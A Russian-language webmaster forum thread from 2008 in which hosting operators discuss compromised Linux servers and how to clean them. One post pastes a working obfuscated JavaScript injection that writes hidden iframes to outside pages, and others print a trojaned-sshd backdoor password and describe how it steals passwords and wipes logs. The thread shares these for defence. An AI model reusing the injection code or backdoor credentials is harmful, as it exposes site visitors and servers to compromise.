Реклама на сайте Advertise with us

Опять поламали

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 03.10.08
Сообщения: 129
Рейтинг: 141

Ссылка на сообщениеДобавлено: 23/10/08 в 22:48       Ответить с цитатойцитата 

Пересмотри все файлы на серве, может обноружишь чужеродный скрипт "шелл".

0
 



С нами с 06.03.04
Сообщения: 5352
Рейтинг: 1678

Ссылка на сообщениеДобавлено: 24/10/08 в 05:56       Ответить с цитатойцитата 

хех, вот и моя очередь пришла icon_sad.gif
ат3 никогда не стояло, директадмина тоже
ось Debian
в netstat вижу по ssh соединение с 99.116.232.72 (что это? это не мое)
кстати, случай не еденичный совсем
http://rightroad.net/forum/index.php?showtopic=23

п.с. и вот такую хрень в футерах всех пхп и нтмл (где есть теги </html> </body>) файлов добавили

<скрипт>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </скрипт>
</html> </body><html><body>
<скрипт>var source ="=jgsbnf!tsd>(iuuq;00qsfwfewtfn234/do0360joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </скрипт>
</body></html> <html> <body><скрипт>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </скрипт>
</html> </body>
</html> <html> <body><скрипт>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </скрипт>

Последний раз редактировалось: awm_mark (24/10/08 в 06:55), всего редактировалось 4 раз(а)

Хостинг, который никогда не подведет !

2
 

Криптопохуист

С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019

Ссылка на сообщениеДобавлено: 24/10/08 в 06:13       Ответить с цитатойцитата 

Бля пошел проверять свои центосы. Вообще в центосе я говорил - дохрена чего открыто по дефалту. Прокмапы, РПЦ, купсы всякие....

0
 

Криптопохуист

С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019

Ссылка на сообщениеДобавлено: 24/10/08 в 06:28       Ответить с цитатойцитата 

3
 



С нами с 06.03.04
Сообщения: 5352
Рейтинг: 1678

Ссылка на сообщениеДобавлено: 24/10/08 в 06:49       Ответить с цитатойцитата 

вобщем тут выход только 1 - формат дисков, реинстал, и осторожно с бэкапами

Хостинг, который никогда не подведет !

2
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 24/10/08 в 06:53       Ответить с цитатойцитата 

Pentarh писал:
Бля пошел проверять свои центосы. Вообще в центосе я говорил - дохрена чего открыто по дефалту. Прокмапы, РПЦ, купсы всякие....


ну веть никто не мешает его выключить.
кроме того у центоса дефолтный фаервол все дефолтные приложения как раз и прикрывает.

P.S.
непойму для чего на рабочем сервере cups?
даже если он нужен как зависисмость (в CentOS5 его фиг удалишь нормально) - никто же не мешает его выключить. хотябы чтобы память не занимал бестолку.

проверил сейчас 72 своих центоса - всё ок ...

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

4
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 24/10/08 в 06:57       Ответить с цитатойцитата 

awm_mark писал:
вобщем тут выход только 1 - формат дисков, реинстал, и осторожно с бэкапами


ну а если при реинстале ты поставишь ту же дыру что и изначально? веть 99.999% что ты будешь ставить ТОТ ЖЕ софт и ТЕ ЖЕ скрипты.

IMHO не факт что ломают (воруют) пароль на рута(любого локального юзера) - поэтому прикрытие фаерволом/тсп-враппером не есть выход из положения.

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

3
 

Криптопохуист

С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019

Ссылка на сообщениеДобавлено: 24/10/08 в 07:02       Ответить с цитатойцитата 

Soft-Com писал:
ну веть никто не мешает его выключить.

ну я его и выключаю руками после сетапа
Soft-Com писал:

кроме того у центоса дефолтный фаервол все дефолтные приложения как раз и прикрывает.

Не видел я там дефолтного файрвола
Soft-Com писал:

непойму для чего на рабочем сервере cups?

Я тоже не пойму нахуя его включают в дефолт + еще штук 5-10 стартап скриптов левых

У моих центососв тоже все впорядке.

3
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 24/10/08 в 07:08       Ответить с цитатойцитата 

Pentarh писал:

У моих центососв тоже все впорядке.

+1 не в ОСи дело, дело в софте.

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 

Криптопохуист

С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019

Ссылка на сообщениеДобавлено: 24/10/08 в 07:11       Ответить с цитатойцитата 

сups в центосе слушает по дефолту от рута на удп 631
udp 0 0 0.0.0.0:631 0.0.0.0:* 19337/cupsd

3
 



С нами с 06.03.04
Сообщения: 5352
Рейтинг: 1678

Ссылка на сообщениеДобавлено: 24/10/08 в 07:18       Ответить с цитатойцитата 

Soft-Com писал:
ну а если при реинстале ты поставишь ту же дыру что и изначально? веть 99.999% что ты будешь ставить ТОТ ЖЕ софт и ТЕ ЖЕ скрипты.

IMHO не факт что ломают (воруют) пароль на рута(любого локального юзера) - поэтому прикрытие фаерволом/тсп-враппером не есть выход из положения.


легче переинсталить и ограничить доступ по айпи
т.к. почистить со 100% гарантией получится ли ?? ведь достаточно даже вэбшелл один пропустить, о руткитах я вобще молчу. Может тут и есть гуру сетевой безопасности, но думаю что их очень мало.

Хостинг, который никогда не подведет !

3
 



С нами с 06.03.04
Сообщения: 5352
Рейтинг: 1678

Ссылка на сообщениеДобавлено: 24/10/08 в 07:20       Ответить с цитатойцитата 

Soft-Com писал:
+1 не в ОСи дело, дело в софте.

дык и софт у всех разный
может в ядре дело ?? давно обновляли ? я на этом серваке никогда, а зря icon_sad.gif , счас посмотрел - как в ноябре 2003 года заинсталили, так никто ничего и не трогал там icon_sad.gif .

п.с. Амхост, почему на тикеты не отвечаете ??? 3 часа уже как отписал

Последний раз редактировалось: awm_mark (24/10/08 в 07:40), всего редактировалось 1 раз

Хостинг, который никогда не подведет !

2
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 24/10/08 в 07:27       Ответить с цитатойцитата 

awm_mark, отписал тебе в аську с контакта 1568562, посмотри плс месагу

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 

Криптопохуист

С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019

Ссылка на сообщениеДобавлено: 24/10/08 в 07:31       Ответить с цитатойцитата 

от вебшеллов спасет мод_секюрити. а руткиты конечно почистить реально, просто намного проще и дешевле систему переустановить.

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 24/10/08 в 07:35       Ответить с цитатойцитата 

IMHO потеря производительности, и не факт что поможет.

SELinux от руткитов реально полечит (доказано занусси), но на производительности скажется очень отрицательно.

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 



С нами с 06.03.04
Сообщения: 5352
Рейтинг: 1678

Ссылка на сообщениеДобавлено: 24/10/08 в 07:42       Ответить с цитатойцитата 

Soft-Com писал:
awm_mark, отписал тебе в аську с контакта 1568562, посмотри плс месагу

у меня в профайле старый (локнутый) номер, отписал тебе с рабочего 461373470, что там ?

Хостинг, который никогда не подведет !

0
 

саблезубый кролик

С нами с 02.07.05
Сообщения: 2966
Рейтинг: 993

Ссылка на сообщениеДобавлено: 24/10/08 в 11:03       Ответить с цитатойцитата 

Pentarh писал:
от вебшеллов спасет мод_секюрити. а руткиты конечно почистить реально, просто намного проще и дешевле систему переустановить.

От вебшеллов намного лучше спасают правильно проставленные права доступа. можно конечно насрать в пользовательский тмп, но толку от этого 0%. Еще конешно можно насрать в кэш APC, но это уже высший пилотаж, я экземпляров таким методом закидывающих сплойты еще не встречал.

.

0
 



С нами с 02.09.06
Сообщения: 598
Рейтинг: 613

Ссылка на сообщениеДобавлено: 24/10/08 в 11:36       Ответить с цитатойцитата 

Проверяйте наличие папки /dev/ssh и подходит ли рутовский пароль KJSA5aHF%^$%^
Это признаки бэкдора на сервере с затрояненым sshd, его надо из исходников пересобрать.

0
 

Cracked by Bill Gilbert

С нами с 16.09.03
Сообщения: 4228
Рейтинг: 2814

Ссылка на сообщениеДобавлено: 24/10/08 в 13:45       Ответить с цитатойцитата 



есть такая хуйня, пароль правда другой, лежит в открытом виде в файле backdoor h
Зашел, запустился сразу ранее найденный морфеус рут.
пиздец icon_smile.gif
Блокировка рута по айпи вообще в этом случае помагает?

Всех с Наступившим Новым Годом!
Статы пиздеж и провокация: ща лучше. СКРИНЫ СТАТСОВ ТУТ Мой ЛЛ

0
 

Криптопохуист

С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019

Ссылка на сообщениеДобавлено: 24/10/08 в 13:48       Ответить с цитатойцитата 

Чето все говорят о пока неизвестной дырке в OpenSSH smail112.gif

Давайте поговорим о том, как можно обезопасить ssh кроме файрвола

0
 



С нами с 02.09.06
Сообщения: 598
Рейтинг: 613

Ссылка на сообщениеДобавлено: 24/10/08 в 13:51       Ответить с цитатойцитата 

Эту х-ня исправляет /etc/ssh/sshd_config, компилит свой ssh с трояном. При изменении пароля отправляет его на hostname@ymail.com (можно увидеть мыло в /usr/sbin/ssh в открытом виде), удаляет /root/.bash_history, /var/log/lastlog, /var/log/messages, /var/log/secure. Поможет только перекомпилирование sshd. Для Центос 4 (и наверно 5) можно делать так:
rm -rf /dev/ssh
cd /usr/local/src && wget http://mirror.mcs.anl.gov/openssh/portable/openssh-5.1p1.tar.gz
tar zxf openssh-5.1p1.tar.gz && cd openssh-5.1p1 && ./configure --prefix=/usr --sysconfdir=/etc/ssh && make && make install && service sshd restart

8
 

Cracked by Bill Gilbert

С нами с 16.09.03
Сообщения: 4228
Рейтинг: 2814

Ссылка на сообщениеДобавлено: 24/10/08 в 14:08       Ответить с цитатойцитата 

Есть ли смысл делать реинстал на другую систему или лучше ждать пока не найдут, как залезли?
Возможно вообще все гавно вычистить? Я смотрю, каждый день находятся новые файлы.

Всех с Наступившим Новым Годом!
Статы пиздеж и провокация: ща лучше. СКРИНЫ СТАТСОВ ТУТ Мой ЛЛ

0
 



С нами с 02.09.06
Сообщения: 598
Рейтинг: 613

Ссылка на сообщениеДобавлено: 24/10/08 в 14:13       Ответить с цитатойцитата 


Переставь ssh, почисти php-shell, смени пароли. Желательно убрать atl3. Вполне реально что взломы прекратятся.

5
 

Криптопохуист

С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019

Ссылка на сообщениеДобавлено: 24/10/08 в 14:18       Ответить с цитатойцитата 

еще yum upgrade поможет )

А какую архитектуру ломают? У меня повсюду amd64 стоит. Стоял сервер голо-установленный с дефолтными настройками и сервисами с ssh на 22 порту. До сих пор не поламали (тьфу-тьфу).

Кстати трой еще прописывается в /etc/rc.local

5
 

Cracked by Bill Gilbert

С нами с 16.09.03
Сообщения: 4228
Рейтинг: 2814

Ссылка на сообщениеДобавлено: 24/10/08 в 14:30       Ответить с цитатойцитата 

supphosting.com писал:
Переставь ssh, почисти php-shell, смени пароли. Желательно убрать atl3. Вполне реально что взломы прекратятся.


at3 непричем, ломали сервера и без них, с протонами.

Всех с Наступившим Новым Годом!
Статы пиздеж и провокация: ща лучше. СКРИНЫ СТАТСОВ ТУТ Мой ЛЛ

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор сайта

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »